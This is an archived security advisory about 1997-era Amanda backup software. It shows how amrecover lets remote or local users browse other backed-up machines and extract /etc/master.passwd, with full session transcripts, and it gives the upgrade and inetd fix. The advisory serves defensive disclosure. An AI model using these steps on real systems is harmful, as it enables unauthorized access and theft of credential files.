TUCoPS :: BSD :: amanda1.htm

Amanda backup software (2.3.0.x, 2.4.0beta) remote vulnerabilities
Vulnerability

    Amanda

Affected

    Systems running Amanda backup software (2.3.0.x, 2.4.0beta)

Description

    Following info is based on CPIO Security Notice (issue number 11).
    There are serveral security problems in the current version of
    Amanda.

        1. Any  attacker  can  remotely  connect  to  an index  server
           allowing that person to access any machine being backed up.
        2. Any attacker with local access to a machine being backed up
           has access to  any machine being  backed up or  any partion
           being backed up via Amanda.

    In example 1 the players are:

        index.servername.net | the affected index server
        remote.attacker.org  | attackers computer
        staff                | a machine being backed up by the index server

        [remote%] amrecover -s index.servername.net
        AMRECOVER Version 1.0. Contacting server on index.servername.net ...
        220 index.servername.net AMANDA index server (1.0) ready.
        Setting restore date to today (1997-12-24)
        200 Working date set to 1997-12-24.
        200 Config set to DailySet1.
        501 No index records for host: remote.attacker.org. Invalid?
        amrecover> sethost staff
        200 Dump host set to staff.
        amrecover> setdisk wd0a
        200 Disk set to wd0a
        amrecover> ls
        [ list of root partion ]

    In example 2 the players are:

        users                | users shell machine being backed up
        staff                | staff machine being backed up

        [users%] amrecover
        AMRECOVER Version 1.0. Contacting server on index.servername.net ...
        220 index.servername.net AMANDA index server (1.0) ready.
        Setting restore date to today (1997-12-24)
        200 Working date set to 1997-12-24.
        200 Config set to DailySet1.
        200 Dump host set to users.
        Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
        200 Disk set to wd0f.
        amrecover> setdisk wd0a
        200 Disk set to wd0a
        amrecover> cd etc
        amrecover> add master.passwd
        Added /etc/master.passwd
        amrecover> extract
        Extracting files using tape drive /dev/nrst0 on host index.servername.net.
        The following tapes are needed: DAILY6
        Restoring files into directory /home/home1/joey
        Continue? [Y/n]: y
        Load tape DAILY6 now
        Continue? [Y/n]: y
        amrecover> quit
        [local%] pwd
        /home/home1/joey
        [local%] ls master.passwd
        master.passwd

    This vulnerability was discovered and described by Joey Novell.
Solution

    Amanda 2.4.0b5  fixes the  amrecover problem  and other  potential
    security holes, and is the  product of a security audit  conducted
    in  conjunction  with  the  OpenBSD  effort.   The  new version is
    available at:

        ftp://ftp.amanda.org/pub/amanda/amanda-2.4.0b5.tar.gz

    Amanda 2.3.0  and earlier  UMD releases  are not  affected by this
    particular  bug,  as  amrecover  was  not  part of those releases.
    However, earlier releases do have potential security problems  and
    other bugs,  so the  Amanda Team  recommends upgrading  to the new
    release as soon as practicable.  At an active site running  Amanda
    2.3.0.x or 2.4.0 beta, amrecover/amindexd can be disabled by:

        - removing amandaidx and amidxtape from /etc/inetd.conf
        - restarting inetd.conf (kill -HUP should do)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH